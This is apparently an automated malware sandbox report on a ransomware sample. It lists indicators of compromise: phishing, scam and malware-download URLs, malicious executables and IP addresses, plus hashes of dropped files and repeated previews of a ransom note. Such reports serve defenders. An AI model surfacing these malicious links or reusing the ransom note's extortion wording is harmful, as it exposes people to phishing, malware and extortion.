                            https://fpso-yfb3p.ondigitalocean.app/rkEX0win0x0786x0999xrkhkxpErr999x/index.php?click_id=611h5axzlp1fwctf&clickid=68ef85ae89b43fdcef0a32b9b672626f&phone=+1-833-741-5228&rezp=611h5axzlp1fwctf-tncle.com-658#Get hashmaliciousTechSupportScamBrowse
                            • 147.135.36.89
                            Docxc-xerox-Printinvoice.exeGet hashmaliciousFormBookBrowse
                            • 51.91.236.193
                            http://moreaboutadvertising.comGet hashmaliciousHTMLPhisherBrowse
                            • 51.79.154.9
                            http://103.30.76.56:8000Get hashmaliciousGhostRat, QuasarBrowse
                            • 147.135.36.89
                            chromebypass.exeGet hashmaliciousUnknownBrowse
                            • 51.38.43.18
                            chromebypass.exeGet hashmaliciousUnknownBrowse
                            • 151.80.29.83
                            https://goo.gl/TZiMbBGet hashmaliciousUnknownBrowse
                            • 158.69.126.131
                            cRmu9LROM09hq1F.exeGet hashmaliciousFormBookBrowse
                            • 94.23.162.163
                            https://apiservices.krxd.net/click_tracker/track?kx_event_uid=LRgb7EaJr&clk=https%3A%2F%2Fbaidu.com/link?url=M_paI8wUUhyFFyYOfkv0BtRO2tYeocT9NZ8JuKTMQbfhljTSzkN9oa0taRuW8_fW&wd#.ZGlyay5kb25hdGhAYWltYXJhY2FwaXRhbC5jb20=Get hashmaliciousHTMLPhisherBrowse
                            • 51.77.72.43
                            https://notifications.google.com/g/p/ANiao5payiDhby3DdHXSQnQRwGSpgKQ0j9dROs0QlcFlm0d0VmhhiNMPZfqA3_67fHWGx3REj-I8KTCJbuqv4c7p1ksWFWM6Vvj06JWsD08fCl1W3Mwkj9n3E8Z8xWeSpPUlPnLJArfStcDbjno6CP9gfqatlD1rR7FCVMbx6LgLy0rSSY3regFXBlhdHFiB08YpFxqnuqa6YyEd1OutuSMCcmmTgsXdvnxrgVqGsM6_cnvaGet hashmaliciousUnknownBrowse
                            • 5.135.113.252
                            SecuriteInfo.com.Win32.RATX-gen.5138.32043.exeGet hashmaliciousFormBookBrowse
                            • 51.91.236.193
                            https://buildsend.com/ws/1.0/viewimage.aspx?c=bs3bElnjM35cIuYS0jC44KF5xlV9G0&i=337660&ct=application/url&f=People%20who%20test%20positive%20or%20were%20exposed&url=https://esquadriascanaa.com.br/unsubscribe/EQJgP/%23a2V2aW4uai5tdXJwaHlAZmFhLmdvdg0=Get hashmaliciousHTMLPhisherBrowse
                            • 142.44.136.72
                            Vl2iPhZcp2.exeGet hashmaliciousSocks5Systemz, XmrigBrowse
                            • 94.23.58.173
                            CLOUDFLARENETUSywkyQKUlD3.exeGet hashmaliciousSodinokibiBrowse
                            • 104.21.10.96
                            jXz2ukrd2P.exeGet hashmaliciousSodinokibi, Chaos, Conti, Netwalker, Python Ransomware, Revil, TrojanRansomBrowse
                            • 104.18.24.153
                            https://t.sidekickopen10.com/Ctc/2P+23284/d5d6Ks04/Jk82-6qcW5BW0B06lZ3pcW2LlW8x52qpw6W5Wx65h9j0zP3W2Dkp9L974ZRlVlx_ls6lw_B2W68pJ0z3nckpfW5F6slJ5M46v1V8L_sB3S1p8dW2_RD1L7XQCWyV-sBK09kjLK7W3Cy0Gm8dxzMlW2ytD1y13XKKTN8LXsKWV87__W5KsfjT6-q43pW8WQHh36F0cwdW21-znT2zQyVtW3bw_9X7LQvkjW7hqsLy2wx0xKMbg3z4vN923f4g4c4x04Get hashmaliciousUnknownBrowse
                            • 104.17.3.184
                            PGeBff2Pio.exeGet hashmaliciousSodinokibi, TrojanRansomBrowse
                            • 172.66.42.253
                            https://download.createmygif.com/CreateMyGif.exeGet hashmaliciousUnknownBrowse
                            • 104.21.35.243
                            https://t.sidekickopen10.com/Ctc/2P+23284/d5d06204/Jks2-6qcW69sMD-6lZ3pfW81T3026frHLKN3pc9_DylPGMW7VG_nc45dZPkW1wHnpj77TmgMW6TLF789bgV_BW7pFxq865QbQXW1rgLS297qdz8W4y62HK44z3X5W2C--f_779BRpW6hB_XP851xXbW8bb1Vs6FGQF-W59VfSD8P03_mW15f5BW71P68zW5gKfyb82nWpDW96V4-x59mDgFW8KzFx314ZddpW4n4PJ57FHD1qV--9kn2hqfbKW5B_N1Y5HwpvFVgp9P51jNmDsf1t5Kwg04Get hashmaliciousUnknownBrowse
                            • 172.64.148.115
                            https://officewebservicesggns2rl54t9zsqge961yjr3td.s3.us-east-2.amazonaws.com/preload-reCaptcha.htmlGet hashmaliciousFake CaptchaBrowse
                            • 1.1.1.1
                            https://strava.app.link/38598S3p?%243p=e_et&%24original_url=https%3A%2F%2Fbaidu.com///link?url=neMQr9azEt--a_UsVGmVNYkDEUPjN_x4zDzsSLNy7lC&wd#.ZXR1emFpdGVAYmlvbGVnZW5kLmNvbQ==Get hashmaliciousFake CaptchaBrowse
                            • 1.1.1.1
                            https://live.easygenerator.com/review/course/de4dcde8-435a-481e-8b8b-16f027088173/Get hashmaliciousHTMLPhisherBrowse
                            • 104.17.25.14
                            https://bergson-law-1322273052.cos.ap-tokyo.myqcloud.com/bergson-law.html?e=#james_karban@baylor.eduGet hashmaliciousHTMLPhisherBrowse
                            • 104.18.11.207
                            https://t.sidekickopen10.com/Ctc/2P+23284/d5d6Ks04/Jks2-6qcW69sMD-6lZ3pdVqXs5S548jDfW5VH1NJ1QwD76VGrtks8BwRn8W8FnB6d8NkwVfW4j3JGh8045H6W4GYwd18pPq1NN5ZBYHvQ_WNcW3fGfyj2lmz46N5v0lq77gNKcVLRpGH342kvPW9drsJ-4MsGWYW75Tkgd7hRCBrW8QF09_7vhN4bW2WXfBr3_LDBMW9b98nc9jj_qDW2FcQVv80nxSxMwvmt5trGxJW33v3Z38HTfP8W12YN1F7PR9fdW6KqpFK4fKc4vf245nHC04Get hashmaliciousUnknownBrowse
                            • 104.21.65.135
                            https://proxedge-my.sharepoint.com/:b:/g/personal/yukthi_proxedge_com1/ESUjydyHqxFJqRgYqxp9DAwB01AxpQpskY1Ia7AcE7IwNw?e=XHJUsfGet hashmaliciousHTMLPhisherBrowse
                            • 104.17.2.184
                            https://seminovos.com.br/noticias/wp-includes/blocks/column/sm13/n.php?id=n064r50nGet hashmaliciousHTMLPhisherBrowse
                            • 104.16.57.101
                            https://download.pdfconvertercompare.com/PdfConverters.exeGet hashmaliciousUnknownBrowse
                            • 104.26.1.18
                            https://www.canva.com/design/DAF0Wahc1no/zsZFCDeauTqC5DJYw7dI9w/view?utm_content=DAF0Wahc1no&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                            • 104.17.2.184
                            https://t.sidekickopen10.com/Ctc/2P+23284/d5d6-w04/JkM2-6qcW6N1vHY6lZ3nKW8wJljK7cvX5TW4-QBtM2J7hhlW2XhyKc75t6-JW82tj6d5jw9tzW94xXFv3tMhffW7WqP2M7bCGBqW52T22n117gCvN4c0HVbJ_mc8W80J-Sg5SsD--N6bSj02q_FdtW6BmYbL37lgXnW65WK4m7Bdq8GW66HBVb2dCCwLW64jK1J6lP2PkV1WmXg13XsrYW1F-9t_3mTDJNN166WjShRlGXW555ffF681-YrMZRpB_lHXCYW57gWSl6dwgM2W51Q9vV4W-1dvW3cZ2w04Tm1Rrf4bvVVP04Get hashmaliciousUnknownBrowse
                            • 172.67.216.69
                            http://go.nypost.com/Get hashmaliciousUnknownBrowse
                            • 162.247.243.29
                            https://monydine.co/category/work/index.htmlGet hashmaliciousUnknownBrowse
                            • 104.26.0.122
                            https://t.sidekickopen10.com/Ctc/2P+23284/d5d6Ks04/Jks2-6qcW69sMD-6lZ3pdVqXs5S548jDfW5VH1NJ1QwD76VGrtks8BwRn8W8FnB6d8NkwVfW4j3JGh8045H6W4GYwd18pPq1NN5ZBYHvQ_WNcW3fGfyj2lmz46N5v0lq77gNKcVLRpGH342kvPW9drsJ-4MsGWYW75Tkgd7hRCBrW8QF09_7vhN4bW2WXfBr3_LDBMW9b98nc9jj_qDW2FcQVv80nxSxMwvmt5trGxJW33v3Z38HTfP8W12YN1F7PR9fdW6KqpFK4fKc4vf245nHC04Get hashmaliciousUnknownBrowse
                            • 104.21.65.135
                            https://live.easygenerator.com/review/course/de4dcde8-435a-481e-8b8b-16f027088173/Get hashmaliciousHTMLPhisherBrowse
                            • 104.17.25.14
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            a0e9f5d64349fb13191bc781f81f42e1ywkyQKUlD3.exeGet hashmaliciousSodinokibiBrowse
                            • 137.74.231.3
                            • 172.67.219.93
                            • 172.67.132.175
                            • 138.197.111.104
                            • 185.32.57.142
                            jXz2ukrd2P.exeGet hashmaliciousSodinokibi, Chaos, Conti, Netwalker, Python Ransomware, Revil, TrojanRansomBrowse
                            • 137.74.231.3
                            • 172.67.219.93
                            • 172.67.132.175
                            • 138.197.111.104
                            • 185.32.57.142
                            a0QFYpDZZz.exeGet hashmaliciousSodinokibiBrowse
                            • 137.74.231.3
                            • 172.67.219.93
                            • 172.67.132.175
                            • 138.197.111.104
                            • 185.32.57.142
                            PGeBff2Pio.exeGet hashmaliciousSodinokibi, TrojanRansomBrowse
                            • 137.74.231.3
                            • 172.67.219.93
                            • 172.67.132.175
                            • 138.197.111.104
                            • 185.32.57.142
                            Viacore Statement.xlsmGet hashmaliciousUnknownBrowse
                            • 137.74.231.3
                            • 172.67.219.93
                            • 172.67.132.175
                            • 138.197.111.104
                            • 185.32.57.142
                            http://KANNADADJMIX.COMGet hashmaliciousHTMLPhisherBrowse
                            • 137.74.231.3
                            • 172.67.219.93
                            • 172.67.132.175
                            • 138.197.111.104
                            • 185.32.57.142
                            HOERBIGER_Adressen 2.HJ_2023.xlsxGet hashmaliciousUnknownBrowse
                            • 137.74.231.3
                            • 172.67.219.93
                            • 172.67.132.175
                            • 138.197.111.104
                            • 185.32.57.142
                            HOERBIGER-Beitr#U00e4ge-2HJ 2023.xlsxGet hashmaliciousUnknownBrowse
                            • 137.74.231.3
                            • 172.67.219.93
                            • 172.67.132.175
                            • 138.197.111.104
                            • 185.32.57.142
                            https://drive.google.com/uc?export=download&confirm=no_antivirus&id=1za6WMBB-L6o_y_wwX3bE6YQ7ktf3L-iZGet hashmaliciousUnknownBrowse
                            • 137.74.231.3
                            • 172.67.219.93
                            • 172.67.132.175
                            • 138.197.111.104
                            • 185.32.57.142
                            file.exeGet hashmaliciousRisePro StealerBrowse
                            • 137.74.231.3
                            • 172.67.219.93
                            • 172.67.132.175
                            • 138.197.111.104
                            • 185.32.57.142
                            exploreRemote_alphav4.exeGet hashmaliciousRemcosBrowse
                            • 137.74.231.3
                            • 172.67.219.93
                            • 172.67.132.175
                            • 138.197.111.104
                            • 185.32.57.142
                            Systembackup.exeGet hashmaliciousRemcosBrowse
                            • 137.74.231.3
                            • 172.67.219.93
                            • 172.67.132.175
                            • 138.197.111.104
                            • 185.32.57.142
                            monscan.exeGet hashmaliciousRemcosBrowse
                            • 137.74.231.3
                            • 172.67.219.93
                            • 172.67.132.175
                            • 138.197.111.104
                            • 185.32.57.142
                            Computo.xlsxGet hashmaliciousUnknownBrowse
                            • 137.74.231.3
                            • 172.67.219.93
                            • 172.67.132.175
                            • 138.197.111.104
                            • 185.32.57.142
                            PM237001-MSE-FI3-00012.xlsmGet hashmaliciousUnknownBrowse
                            • 137.74.231.3
                            • 172.67.219.93
                            • 172.67.132.175
                            • 138.197.111.104
                            • 185.32.57.142
                            Watchercli.exeGet hashmaliciousRemcosBrowse
                            • 137.74.231.3
                            • 172.67.219.93
                            • 172.67.132.175
                            • 138.197.111.104
                            • 185.32.57.142
                            tsnsign.exeGet hashmaliciousRemcosBrowse
                            • 137.74.231.3
                            • 172.67.219.93
                            • 172.67.132.175
                            • 138.197.111.104
                            • 185.32.57.142
                            securitydriver_debug.exeGet hashmaliciousRemcosBrowse
                            • 137.74.231.3
                            • 172.67.219.93
                            • 172.67.132.175
                            • 138.197.111.104
                            • 185.32.57.142
                            2yhQN6We8o.exeGet hashmaliciousPrivateLoader, RedLine, RisePro StealerBrowse
                            • 137.74.231.3
                            • 172.67.219.93
                            • 172.67.132.175
                            • 138.197.111.104
                            • 185.32.57.142
                            zOeRrMc7e1.exeGet hashmaliciousPrivateLoader, RedLine, RisePro StealerBrowse
                            • 137.74.231.3
                            • 172.67.219.93
                            • 172.67.132.175
                            • 138.197.111.104
                            • 185.32.57.142
                            No context
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):20704
                            Entropy (8bit):7.98948247213665
                            Encrypted:false
                            SSDEEP:384:sZ4DQyr2GPkZMTk8JltBAcCJByblkvPhRShUSSg+7/r5Giovi+egHR9:sZYV4Zx+AcCTM+PhshUSS7/9GiiXD
                            MD5:E6D89F490EF16D04E1BC044E35D0A223
                            SHA1:4D14F7B80D5C0ED28B7E143E658BFCDC47713DD0
                            SHA-256:50D3E3DF3DEE66225FFC791FBD8763BC8E4D0B4AD33380746CA6DB37B6485FEF
                            SHA-512:5A468ED7C6DED6A628E1C9E4E2F485632FFD2EA001D5D9824A4C37E6A105051A466B5B781AEBEB078C33126F04DE13F7FBFDA636849B31A9018763BF03F1A2AF
                            Malicious:false
                            Reputation:low
                            Preview:.+...W..gq..;......f...3Pi|b"LV.;....A.3+...<..Q^...Q._`.# .s..&9...JJ.l.....&.#..f...gxv]..L...J...}...]X.....c...M..T.7....Op.^..%..u..tU...........VO......G71..........p.R..).....6...0Er.+.?5}...}1.....c...L.5..6'...9....i?y.F....n.8Ty..J..2L.cy.9..U.sV...l..}6....sH(A..Ac...8........./o.....!....[..Q...<d.C......C...isa.3.H-.-...s.]...".."_...*.;.[...3a.nQ.b...!.A...FD....'8"J..WIX..3..f..@o$".&... .;.kj.o..Zs..H-..^M......pp.61.V.......0.E.1.........-..x....o<.dAc..A9P...@..zLl..........@.:"..u..&..].C....3U..)m~K.P...!`9...|.....A........4..".t....O.<.A......s....+...3V...?BuD...$.>....5$....?...d.{.r.......c...8U....bP]^;$p....{..W.s.'...[..=e[....2jsi....r.l...mY....0rZ..U...D-..jO.:J.{....q..e..M.\...<o.2(..'n.xo(....Xl..X....tv.. f.e{....<_...>......e./.u.=..t..!...l3.$k..:.Iz...'..X..].....v....],vZ..a.....B........8........B.-q.a.P....F.3b.{.z.".".........:E.{.^.zYU...~}.p...YNQ..........Dfw.F...........`..'.l
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Reputation:low
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:true
                            Reputation:low
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Reputation:low
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:true
                            Reputation:low
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Reputation:low
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:true
                            Reputation:low
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. 